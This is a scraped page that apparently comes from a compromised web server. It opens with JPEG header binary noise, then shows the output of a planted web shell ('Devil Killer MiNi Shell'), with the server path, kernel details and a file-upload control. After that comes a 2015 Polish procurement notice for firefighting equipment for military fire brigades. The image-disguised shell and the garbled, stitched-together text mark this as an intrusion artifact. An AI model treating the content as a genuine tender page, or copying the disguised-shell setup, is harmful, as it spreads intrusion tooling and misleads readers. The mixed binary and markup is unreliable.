JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150918/137979-N-2015.html

<p class="kh_header"><b>Warszawa: Zakup sprzętu pożarniczego na zaopatrzenie Wojskowych Straży Pożarnych w obszarze działania SZI - SPRAWA 81/2015</b><br>
<b>Numer ogłoszenia: 137979 - 2015; data zamieszczenia: 18.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Stołeczny Zarząd Infrastruktury , Al. Jerozolimskie 97, 00-909 Warszawa, woj. mazowieckie, tel. 022 6840328, faks 022 8250803, 6846704.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szi.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup sprzętu pożarniczego na zaopatrzenie Wojskowych Straży Pożarnych w obszarze działania SZI - SPRAWA 81/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup sprzętu pożarniczego na zaopatrzenie Wojskowych Straży Pożarnych podległych Stołecznemu Zarządowi Infrastruktury.

1. Szczegółowy opis przedmiotu zamówienia zawarty został w Formularzach cenowych stanowiących załączniki od nr 2 do nr 5 do SIWZ oraz w Załącznikach od nr 6 do nr 9 do SIWZ.
2. Sprzęt pożarniczy oferowany przez dostawcę musi być fabrycznie nowy z produkcji 2015 roku oraz powinien spełniać wszystkie wymogi odpowiednich krajowych i światowych norm i standardów jakości. 
3. Zamawiający żąda od oferentów pod rygorem ważności oferty na etapie otwarcia ofert wymienionych w opisie dokumentów oraz kart katalogowych umożliwiających identyfikację wyrobów..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca obowiązany jest wnieść wadium w wysokości:
Dla części I - 2.000,00 zł. 
Dla części II - 1.600,00 zł. 
Dla części III - 2.700,00 zł. 
Dla części IV - 500,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien załączyć do oferty:
- Oświadczenie Wykonawcy o spełnieniu warunków udziału - Załącznik nr 10 do SIWZ;
- oświadczenie - Załącznik nr 14 do SIWZ.
- Dla części I - kserokopie niżej wymienionych dokumentów, (poświadczonych za zgodność z oryginałem i podpisanych przez osobę prawnie reprezentującą firmę): 
Latarka kątowa akumulatorowa LED - atest ATEX dla urządzeń grupy II i deklaracja zgodności WE;   
Detektor prądu przemiennego - deklaracja zgodności WE;   
Zestaw flar elektronicznych - certyfikat zgodności elektromagnetycznej CE oraz raporty badań na zgodność elektromagnetyczną potwierdzone przez niezależny instytut badawczy; 
Dalmierz laserowy - deklaracja zgodności WE;   
Przenośny miernik tlenku węgla - Oświadczenie o posiadaniu atestu kalibracji - Świadectwa wzorcowania (okres między wymaganymi  kalibracjami minimum 2 lata) - Załącznik nr 14 do SIWZ oraz deklaracja zgodności WE;

Dla części II - kserokopie niżej wymienionych dokumentów, (poświadczonych za zgodność z oryginałem i podpisanych przez osobę prawnie reprezentującą firmę): 
Toporek strażacki z pokrowcem - świadectwo dopuszczenia do użytkowania CNBOP;
Pilarka spalinowa łańcuchowa do drewna - deklaracja zgodności WE; 
Ubranie specjalne chroniące przed promieniowaniem cieplnym i płomieniem - Typ3: - świadectwo dopuszczenia do użytkowania CNBOP i Certyfikat oceny typu WE CIOP lub innej jednostki notyfikowanej; 
Ubranie zabezpieczające przed ukąszeniami owadów - deklaracja zgodności WE;
Deska ortopedyczna - deklaracja zgodności WE;
Materac próżniowy - deklaracja zgodności WE;
Kamizelka unieruchamiająca KED (KUK)  - deklaracja zgodności WE;

Dla części III - kserokopie niżej wymienionych dokumentów, (poświadczonych za zgodność z oryginałem i podpisanych przez osobę prawnie reprezentującą firmę): 
Zbiornik wodny przenośny 2500 l. - świadectwo dopuszczenia do użytkowania CNBOP;
Hełm strażacki - świadectwo dopuszczenia do użytkowania CNBOP i  Certyfikat oceny typu WE CIOP lub innej jednostki notyfikowanej; 
Latarka strażacka na hełm - deklaracja zgodności WE;
Prądownica turbo 52 - świadectwo dopuszczenia do użytkowania CNBOP;
Prądownica turbo 75 - świadectwo dopuszczenia do użytkowania CNBOP;
Wąż ssawny 110-1600 PCV z łącznikami - Świadectwo dopuszczenia do użytkowania CNBOP;

Dla części IV - kserokopie niżej wymienionych dokumentów, (poświadczonych za zgodność z oryginałem i podpisanych przez osobę prawnie reprezentującą firmę): 
Zasysacz liniowy Z-2 - świadectwo dopuszczenia do użytkowania CNBOP;
Zasysacz liniowy Z-4  - świadectwo dopuszczenia do użytkowania CNBOP;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien załączyć do oferty:
- Wykaz wykonanych głównych dostaw (związanych z dostawą sprzętu ppoż) w okresie ostatnich trzech lat przed upływem terminu składania ofert o udzielenie zamówienia o minimalnej wartości zamówienia: część I - mierniki i oświetlenie - 45.000,00 zł brutto, część II - wyposażenie straży - 40.000,00 zł. brutto, część III - armatura pożarnicza - 70.000,00 zł. brutto, część IV - zasysacze - dowody/referencje nie są wymagane, jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - (wzór Załącznik nr 13 do SIWZ), wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane, oraz  załączeniem dowodów, czy zostały wykonane należycie lub są wykonywane należycie. 
b)  oświadczenie - Załącznik nr 10 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien załączyć do oferty: 
a) oświadczenie - Załącznik nr 10 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien załączyć do oferty: 
a) oświadczenie - Załącznik nr 10 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien załączyć do oferty: 
a) oświadczenie - Załącznik nr 10 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykaz wykonanych głównych dostaw (związanych z dostawą sprzętu ppoż) w okresie ostatnich trzech lat przed upływem terminu składania ofert o udzielenie zamówienia o minimalnej wartości zamówienia: część I - mierniki i oświetlenie - 45.000,00 zł brutto, część II - wyposażenie straży - 40.000,00 zł. brutto, część III - armatura pożarnicza - 70.000,00 zł. brutto, część IV - zasysacze - dowody/referencje nie są wymagane jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - (wzór Załącznik nr 13 do SIWZ), wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane, oraz  załączeniem dowodów, czy zostały wykonane należycie lub są wykonywane należycie. 

Zgodnie z art. 24 ust. 2a Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał, lub nienależycie wykonał zamówienie co Zamawiający jest w stanie wskazać za pomocą dowolnych środków dowodowych.
Zamawiający nie wyklucza z postępowania o udzielenie zamówienia Wykonawcy, który udowodni że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawi szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty (Załącznik nr 1 do SIWZ), 
2.  Formularz/e cenowy/e (Załącznik nr 2 i/lub 3 i/lub 4 i/lub 5 do SIWZ) 
3. Oświadczenie (Załącznik nr 14 do SIWZ)
4. W ZALEŻNOŚCI OD CZĘŚCI W KTÓREJ WYKONAWCA SKŁADA OFERTĘ, DODATKOWO, ZAMAWIAJĄCY WYMAGA ZŁOŻENIA 
Dla części I - kserokopie n/w dokumentów, (poświadczonych za zgodność z oryginałem i podpisanych przez osobę prawnie reprezentującą firmę): 
Latarka kątowa akumulatorowa LED - atest ATEX dla urządzeń grupy II i deklaracja zgodności WE;   
Detektor prądu przemiennego - deklaracja zgodności WE;   
Zestaw flar elektronicznych - certyfikat zgodności elektromagnetycznej CE oraz raporty badań na zgodność elektromagnetyczną potwierdzone przez niezależny instytut badawczy; 
Dalmierz laserowy - deklaracja zgodności WE;   
Przenośny miernik tlenku węgla - Oświadczenie o posiadaniu atestu kalibracji - Świadectwa wzorcowania (okres między wymaganymi  kalibracjami minimum 2 lata) - Załącznik nr 14 do SIWZ oraz deklaracja zgodności WE;

Dla części II - kserokopie n/w dokumentów, (poświadczonych za zgodność z oryginałem i podpisanych przez osobę prawnie reprezentującą firmę): 
Toporek strażacki z pokrowcem - świadectwo dopuszczenia do użytkowania CNBOP;
Pilarka spalinowa łańcuchowa do drewna - deklaracja zgodności WE; 
Ubranie specjalne chroniące przed promieniowaniem cieplnym i płomieniem - Typ3: - świadectwo dopuszczenia do użytkowania CNBOP i Certyfikat oceny typu WE CIOP lub innej jednostki notyfikowanej; 
Ubranie zabezpieczające przed ukąszeniami owadów - deklaracja zgodności WE;
Deska ortopedyczna - deklaracja zgodności WE;
Materac próżniowy - deklaracja zgodności WE;
Kamizelka unieruchamiająca KED (KUK)  - deklaracja zgodności WE;

Dla części III - kserokopie n/w dokumentów, (poświadczonych za zgodność z oryginałem i podpisanych przez osobę prawnie reprezentującą firmę): 
Zbiornik wodny przenośny 2500 l. - świadectwo dopuszczenia do użytkowania CNBOP;
Hełm strażacki - świadectwo dopuszczenia do użytkowania CNBOP i  Certyfikat oceny typu WE CIOP lub innej jednostki notyfikowanej; 
Latarka strażacka na hełm - deklaracja zgodności WE;
Prądownica turbo 52 - świadectwo dopuszczenia do użytkowania CNBOP;
Prądownica turbo 75 - świadectwo dopuszczenia do użytkowania CNBOP;
Wąż ssawny 110-1600 PCV z łącznikami - Świadectwo dopuszczenia do użytkowania CNBOP;

Dla części IV - kserokopie n/w dokumentów, (poświadczonych za zgodność z oryginałem i podpisanych przez osobę prawnie reprezentującą firmę): 
Zasysacz liniowy Z-2 - świadectwo dopuszczenia do użytkowania CNBOP;
Zasysacz liniowy Z-4  - świadectwo dopuszczenia do użytkowania CNBOP;

Ponadto zaleca się załączenie do oferty niżej wymieniony dokument:
Kserokopia potwierdzenia wpłaty wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin realizacji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie możliwość zmiany postanowień umowy na podstawie art. 144 ustawy Pzp. w następujących przypadkach:
1)Zmiany danych dotyczących stron umowy, jak zmiana nazwy (jeśli nie oznacza przekształcenia podmiotowego lub przedmiotowego) siedziby, adresu, numeru konta bankowego np. w przypadku zmian wpisów w ewidencji działalności gospodarczej lub KRS; 
2)Osób upoważnionych, jako przedstawiciele stron itp., w przypadku nieprzewidzianych zdarzeń losowych takich jak m.in. choroba, śmierć, ustanie stosunku pracy;
3) Zmiany terminu realizacji zamówienia w przypadku:
a)wstrzymania dostaw przez Zamawiającego z przyczyn leżących po stronie Zamawiającego termin wykonania umowy może ulec przesunięciu o okres nie dłuższy niż okres 30 dni,
b)wystąpienia siły wyższej (zdarzenia, których nie mogły przewidzieć, którym nie mogły zapobiec ani którym nie mogły przeciwdziałać, a które uniemożliwiają Wykonawcy w całości lub części jego zobowiązań) lub innych okoliczności niezależnych od Wykonawcy lub których Wykonawca przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć, jak również inne przeszkody lub utrudnienia w wykonaniu przedmiotu umowy spowodowane przez osobę trzecią - o czas działania siły wyższej oraz czas potrzebny do usunięcia skutków jej działania oraz usunięcia przeszkód;
4.Zmiany inne w przypadku zmian w prawie, ustawach i rozporządzeniach, które nastąpiły po dniu otwarcia ofert oraz na skutek innych przyczyn związanych z realizacją przedmiotu zamówienia, a niezależnych od stron.
Zmiany w wyżej opisanym zakresie mogą być dokonane w zawartych umowach wyłącznie   w formie pisemnej, w postaci aneksu do umowy, pod rygorem nieważności wprowadzonych zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szi.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Strona internetowa www.szi.wp.mil.pl lub 
Siedziba Zamawiającego: 
Stołeczny Zarząd Infrastruktury 
Al. Jerozolimskie 97 
00-909 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.10.2015 godzina 09:30, miejsce: Siedziba Zamawiającego: 
Stołeczny Zarząd Infrastruktury 
Al. Jerozolimskie 97 
00-909 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mierniki i oświetlenie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozgałęziacz elektryczny 3-pozycyjny szt. 13, 
Latarka kątowa akumulatorowa LED szt. 50, 
Detektor prądu przemiennego szt. 12, 
Zestaw flar elektronicznych LED kpl. 12, 
Dalmierz laserowy szt. 1, 
Przenośny miernik tlenku węgla szt. 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.90</li>
<li>2. Termin realizacji - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wyposażenie straży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Toporek strażacki z pokrowcem szt.  20,
Pilarka spalinowa łańcuchowa do drewna szt.    2
Tłumica szt.   20,
Pokrowiec na maskę aparatu powietrznego szt.  50,
Przebijak do szyb szt.  25,
Lizak do sterowania ruchem szt.  25,
Rękawice lateksowe szt.  30,
Gwizdek szt.  50,
Okulary ochronne gogle szt.  50
Ubranie specjalne chroniące przed promieniowaniem cieplnym i płomieniem - Typ3  Kpl.   4
Ubranie zabezpieczające przed ukąszeniami owadów Kpl.  13 
Deska ortopedyczna  Szt.   12
Materac próżniowy Kpl.  12
Kamizelka unieruchamiająca KED (KUK)  Szt.   12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Armatura pożarnicza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zbiornik wodny przenośny szt.    8,
Hełm strażacki szt.  80,
Latarka strażacka na hełm szt.  80,
Pływak smoka ssawnego szt.    6,
Prądownica 52 Turbo szt.  10,
Prądownica 75 Turbo szt.    8,
Nakładka do wytwarzania piany ciężkiej  do poz. 5. szt.  10,
Nakładka do wytwarzania piany ciężkiej  do poz. 6 szt.    8,
Waż ssawny 110- 1600  PCV z łącznikami szt. 20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.90</li>
<li>2. Termin realizacji - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zasysacze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zasysacz liniowy Z-2 szt.    8
Zasysacz liniowy Z-4 szt.    8
Wąż do zasysaczy szt.   20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
